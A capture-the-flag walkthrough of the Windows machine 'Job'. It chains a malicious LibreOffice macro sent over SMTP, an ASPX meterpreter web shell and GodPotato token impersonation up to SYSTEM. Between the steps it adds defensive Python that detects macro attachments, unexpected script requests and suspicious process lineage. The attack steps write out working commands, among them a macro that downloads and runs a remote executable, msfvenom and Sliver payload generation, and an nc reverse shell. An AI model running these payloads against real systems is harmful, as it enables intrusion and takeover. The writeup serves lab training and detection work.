
Machine (Medium) - Job

Writeup for the Job machine, a Windows-based box involving malicious macro delivery via SMTP, remote code execution through LibreOffice, and privilege escalation using exposed web paths and token impersonation.

Writeup Author: BobBuilder


Objective: Exploit an email-based document parsing service and escalate to SYSTEM via web-based payload execution.

Category   Difficulty   Platform   Machine Author
Machine    Medium       Windows    xct


User

Port Scan

Nmap revealed the following open ports on <job_ip>:

  • 25: hMailServer (SMTP)
  • 80: Microsoft IIS 10.0 (HTTP)
  • 445: SMB
  • 3389: RDP with domain name JOB

Exploit Document Parser via SMTP

The website indicates:

"Please send your application to career@job.local as a LibreOffice document."

We create a malicious .ods document with a macro that fetches and executes a reverse shell:

Sub Main
    Shell("cmd /c powershell ""curl http://<attacker_ip>/vl.exe -o C:\Users\Public\Downloads\vl.exe;C:\Users\Public\Downloads\vl.exe""")
End Sub

We generate the payload with Sliver:

sliver > generate --os windows -f exe --mtls <attacker_ip> --reconnect 60 --save vl.exe

We send the malicious document via SMTP using swaks:

swaks --to career@job.local --from attacker@evil.com \
  --header "Subject: Job Application" \
  --body "Please find my resume attached." \
  --attach-type application/vnd.oasis.opendocument.text \
  --attach sliver.ods
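From the defender's side, the delivery step above is the cheapest place to break this chain: an OpenDocument file is a ZIP package, so a mail gateway can open it, quarantine any document that ships a Basic macro library, and also log that the attachment's declared MIME type (opendocument.text in the swaks command) does not match the package's own mimetype entry (a spreadsheet). The following Python is an added example, not code from the writeup or from any tool it names. It assumes the standard ODF package layout (an uncompressed mimetype member, META-INF/manifest.xml, macros stored as Basic/<library>/<module>.xml) and builds its own minimal .ods in memory for the test, with a harmless macro body.

```python
"""Mail-gateway check for OpenDocument attachments that carry Basic macros.

Added example for this writeup, not the author's tooling. Assumes the standard
ODF package layout: a ZIP whose 'mimetype' member names the document type,
a META-INF/manifest.xml listing every member, and LibreOffice Basic macros
stored as Basic/<Library>/<Module>.xml.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

ODF_MIMETYPES = {
    "application/vnd.oasis.opendocument.text",
    "application/vnd.oasis.opendocument.spreadsheet",
    "application/vnd.oasis.opendocument.presentation",
}
MANIFEST_NS = "{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}"
# Basic calls that justify a human look before delivery (constructed watch-list, not exhaustive)
SUSPICIOUS_CALLS = ("Shell(", "powershell", "cmd /c", "CreateUnoService(")
# Library index files under Basic/ describe the library; they are not macro source
INDEX_FILES = ("script-lc.xml", "script-lb.xml")


def inspect_odf_attachment(data: bytes, declared_mime: str) -> dict:
    """Classify one attachment: 'allow', 'review' (odd but macro-free) or 'quarantine' (has macros)."""
    result = {"mimetype": None, "macro_modules": [], "suspicious": [],
              "mime_mismatch": False, "verdict": "allow"}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        result["verdict"] = "review"          # labelled as ODF but not a valid package
        return result
    names = set(zf.namelist())
    if "mimetype" in names:
        result["mimetype"] = zf.read("mimetype").decode("ascii", "replace").strip()
    if result["mimetype"] not in ODF_MIMETYPES:
        result["verdict"] = "review"          # unknown package type, do not trust the label
        return result
    # The swaks command in the writeup declares opendocument.text for an .ods file;
    # a mismatch like that is cheap to detect and worth logging.
    result["mime_mismatch"] = declared_mime != result["mimetype"]

    # Macro modules: ZIP members under Basic/ plus anything the manifest claims is there
    modules = {n for n in names if n.startswith("Basic/") and n.endswith(".xml")}
    if "META-INF/manifest.xml" in names:
        root = ET.fromstring(zf.read("META-INF/manifest.xml"))
        for entry in root.iter(MANIFEST_NS + "file-entry"):
            path = entry.get(MANIFEST_NS + "full-path", "")
            if path.startswith("Basic/") and path.endswith(".xml"):
                modules.add(path)
    result["macro_modules"] = sorted(m for m in modules if not m.endswith(INDEX_FILES))

    # Pull the Basic source text out of each module and look for the watch-listed calls
    for module in result["macro_modules"]:
        if module in names:
            source = "".join(ET.fromstring(zf.read(module)).itertext()).lower()
            result["suspicious"] += [c for c in SUSPICIOUS_CALLS if c.lower() in source]

    if result["macro_modules"]:
        result["verdict"] = "quarantine"
    elif result["mime_mismatch"]:
        result["verdict"] = "review"
    return result


def build_sample_ods(with_macro: bool) -> bytes:
    """Constructed minimal .ods for testing; the macro body is deliberately harmless."""
    entries = ["content.xml"] + (["Basic/script-lc.xml", "Basic/Standard/script-lb.xml",
                                  "Basic/Standard/Module1.xml"] if with_macro else [])
    manifest = ('<?xml version="1.0" encoding="UTF-8"?>\n'
                '<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0">\n'
                ' <manifest:file-entry manifest:full-path="/" '
                'manifest:media-type="application/vnd.oasis.opendocument.spreadsheet"/>\n'
                + "".join(f' <manifest:file-entry manifest:full-path="{e}" manifest:media-type="text/xml"/>\n'
                          for e in entries)
                + '</manifest:manifest>')
    module = ('<?xml version="1.0" encoding="UTF-8"?>\n'
              '<script:module xmlns:script="http://openoffice.org/2000/script" '
              'script:name="Module1" script:language="StarBasic">Sub Main\n'
              '    Shell(&quot;cmd /c echo sample&quot;)\n'
              'End Sub\n</script:module>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # ODF requires 'mimetype' to be the first member and stored uncompressed
        zf.writestr(zipfile.ZipInfo("mimetype"), "application/vnd.oasis.opendocument.spreadsheet",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("META-INF/manifest.xml", manifest)
        zf.writestr("content.xml", '<?xml version="1.0"?><office:document-content '
                    'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"/>')
        if with_macro:
            zf.writestr("Basic/script-lc.xml", '<?xml version="1.0"?><library:libraries '
                        'xmlns:library="http://openoffice.org/2000/library"/>')
            zf.writestr("Basic/Standard/script-lb.xml", '<?xml version="1.0"?><library:library '
                        'xmlns:library="http://openoffice.org/2000/library" library:name="Standard"/>')
            zf.writestr("Basic/Standard/Module1.xml", module)
    return buf.getvalue()


if __name__ == "__main__":
    for macro, declared in ((True, "application/vnd.oasis.opendocument.text"),
                            (False, "application/vnd.oasis.opendocument.spreadsheet")):
        print(inspect_odf_attachment(build_sample_ods(macro), declared))
```

The verdict deliberately keys on the presence of a macro module rather than on the watch-list hits: a recruiting mailbox has no reason to accept documents with embedded code at all, and the call list only serves to prioritise what an analyst looks at first.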

Sliver Callback and Shell

We receive a callback from vl.exe, landing a low-privilege shell as jack.black.

We upload winPEAS for local enumeration:

sliver > upload winPEASx64.exe C:\Users\Public\Downloads\peas.exe

Enumeration and Pivot to Web Root

We discover two interesting files:

C:\Users\jack.black\Documents\Default.rdp
C:\inetpub\wwwroot\hello.aspx

Finding hello.aspx in the web root confirms that jack.black can write to the IIS web root.

Web Shell for Privilege Escalation

We generate a Meterpreter ASPX payload and place it in the web root:

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp \
  LHOST=<tun0_ip> LPORT=4445 -f aspx > indx.aspx

Upload to:

C:\inetpub\wwwroot\indx.aspx

Trigger the shell:

http://job.vl/indx.aspx
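Every request that triggers the dropped page leaves a line in the IIS W3C log, which gives the defender a second detection point independent of the file system: any request for a server-side script that is not part of the deployed site. The Python below is an added example, not the writeup author's code. It assumes IIS W3C extended logging with a #Fields: header; the log lines are constructed, with hello.aspx taken from the writeup as the page that legitimately exists and indx.aspx as the one that does not.

```python
"""Find requests for server-side scripts that were never part of the deployment.

Added example, not from the writeup. Assumes IIS W3C extended log format with a
'#Fields:' header line; SAMPLE_IIS_LOG is constructed, with the path names
taken from the writeup (hello.aspx shipped with the site, indx.aspx did not).
"""

SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-03-01 09:12:01 10.10.10.5 GET / - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 15
2024-03-01 09:12:03 10.10.10.5 GET /hello.aspx - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 22
2024-03-01 09:40:51 10.10.10.5 GET /indx.aspx - 80 - 10.10.14.2 curl/8.4.0 200 0 0 3012
2024-03-01 09:41:07 10.10.10.5 GET /indx.aspx - 80 - 10.10.14.2 curl/8.4.0 500 0 0 8
2024-03-01 09:45:00 10.10.10.5 GET /favicon.ico - 80 - 10.10.14.9 Mozilla/5.0 404 0 2 1
2024-03-01 09:46:12 10.10.10.5 GET /probe.aspx - 80 - 10.10.14.9 Mozilla/5.0 404 0 2 1
"""

# Constructed allowlist: the paths a deployment manifest says belong in wwwroot
DEPLOYED = {"/", "/hello.aspx", "/favicon.ico"}
# Extensions IIS hands to a script engine; a hit on one of these means code ran
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".svc")


def parse_w3c(text: str):
    """Yield one dict per log record, keyed by the names in the most recent #Fields: line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))


def unexpected_script_requests(text: str, deployed=DEPLOYED) -> dict:
    """Group requests for script paths outside the allowlist; 'executed' is True once any returned 200."""
    seen = {}
    for rec in parse_w3c(text):
        path = rec["cs-uri-stem"].lower()
        if path in deployed or not path.endswith(SCRIPT_EXT):
            continue
        entry = seen.setdefault(path, {"first_seen": rec["date"] + " " + rec["time"],
                                       "hits": 0, "clients": set(), "executed": False})
        entry["hits"] += 1
        entry["clients"].add(rec["c-ip"])
        if rec["sc-status"] == "200":
            entry["executed"] = True      # the script existed on disk and the engine ran it
    return seen


if __name__ == "__main__":
    for path, info in unexpected_script_requests(SAMPLE_IIS_LOG).items():
        print(path, info)
```

The executed flag is the part worth alerting on: a 404 for an unknown .aspx is ordinary scanner noise, but a 200 means a script that the deployment never shipped was present in the web root and ran, which is exactly the condition the indx.aspx step above creates.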

Meterpreter Session and Token Privileges

Start the handler and wait for the connection:

msf6 > use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
run

Check privileges:

meterpreter > getprivs

The output lists SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, among others. Holding either of these makes the account a candidate for token-based escalation.


Root

Abuse Token Impersonation for SYSTEM

We use a tool like GodPotato to impersonate SYSTEM and trigger a reverse shell:

C:\Users\Public\Downloads\god.exe -cmd "C:\Users\Public\Downloads\nc.exe <attacker_ip> 4446 -e cmd.exe"

Catch the shell on your listener:

nc -lvnp 4446

You now have a SYSTEM shell.
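Both the web-shell step and the token-impersonation step above show up in process-creation telemetry as lineage that a healthy IIS host never produces: the IIS worker process starting a command interpreter, and a process running as SYSTEM whose parent did not. The following Python is an added example, not the writeup author's code, serving both the Web Shell for Privilege Escalation section and this Root section. The records are constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage, User, ParentUser); the image names w3wp.exe, god.exe and nc.exe follow the writeup's chain, and the app-pool identity is an assumption, since the writeup does not state which account the ASPX shell ran as.

```python
"""Two lineage checks over process-creation records.

Added example, not from the writeup. SAMPLE_EVENTS is constructed in the shape
of Sysmon Event ID 1 fields; the account 'IIS APPPOOL\\DefaultAppPool' is an
assumption about the identity the ASPX web shell ran under.
"""
import ntpath

SYSTEM = "nt authority\\system"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_WORKERS = {"w3wp.exe"}

SAMPLE_EVENTS = [
    # ordinary boot-time lineage: SYSTEM parent, SYSTEM child
    {"ProcessId": 520, "Image": r"C:\Windows\System32\services.exe", "User": "NT AUTHORITY\\SYSTEM",
     "ParentProcessId": 400, "ParentImage": r"C:\Windows\System32\wininit.exe", "ParentUser": "NT AUTHORITY\\SYSTEM"},
    # ordinary interactive use by the low-privilege user
    {"ProcessId": 2100, "Image": r"C:\Windows\System32\notepad.exe", "User": "JOB\\jack.black",
     "ParentProcessId": 2000, "ParentImage": r"C:\Windows\explorer.exe", "ParentUser": "JOB\\jack.black"},
    # web shell: the IIS worker process spawns a command interpreter
    {"ProcessId": 3100, "Image": r"C:\Windows\System32\cmd.exe", "User": "IIS APPPOOL\\DefaultAppPool",
     "ParentProcessId": 3000, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
    # the impersonation tool itself still runs as the app-pool identity
    {"ProcessId": 3200, "Image": r"C:\Users\Public\Downloads\god.exe", "User": "IIS APPPOOL\\DefaultAppPool",
     "ParentProcessId": 3100, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
    # its child runs as SYSTEM although the parent did not: the privilege jump
    {"ProcessId": 3300, "Image": r"C:\Users\Public\Downloads\nc.exe", "User": "NT AUTHORITY\\SYSTEM",
     "ParentProcessId": 3200, "ParentImage": r"C:\Users\Public\Downloads\god.exe",
     "ParentUser": "IIS APPPOOL\\DefaultAppPool"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so rules compare images not locations."""
    return ntpath.basename(path).lower()


def detect_suspicious_lineage(events, allowed_elevators=frozenset()) -> list:
    """Return one finding per record that breaks either rule.

    allowed_elevators: parent image names a site baseline permits to launch
    SYSTEM children from a non-SYSTEM context (empty by default; tune per host).
    """
    findings = []
    for ev in events:
        child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        child_user, parent_user = ev["User"].lower(), ev["ParentUser"].lower()
        if parent in WEB_WORKERS and child in SHELLS:
            findings.append({"rule": "web-worker-spawned-shell", "pid": ev["ProcessId"],
                             "detail": f"{parent} -> {child} as {ev['User']}"})
        if child_user == SYSTEM and parent_user != SYSTEM and parent not in allowed_elevators:
            findings.append({"rule": "system-child-of-non-system-parent", "pid": ev["ProcessId"],
                             "detail": f"{parent} ({ev['ParentUser']}) -> {child} ({ev['User']})"})
    return findings


if __name__ == "__main__":
    for f in detect_suspicious_lineage(SAMPLE_EVENTS):
        print(f["rule"], f["pid"], f["detail"])
```

The second rule is the one that catches the potato family generically: whatever the tool is named, the observable is a SYSTEM child under a parent that lacks that token. Keeping allowed_elevators empty until a baseline shows legitimate exceptions on the host avoids tuning the rule blind. The matching mitigation is the one the getprivs output points at: run application pools under identities that do not hold SeImpersonatePrivilege unless the application needs it.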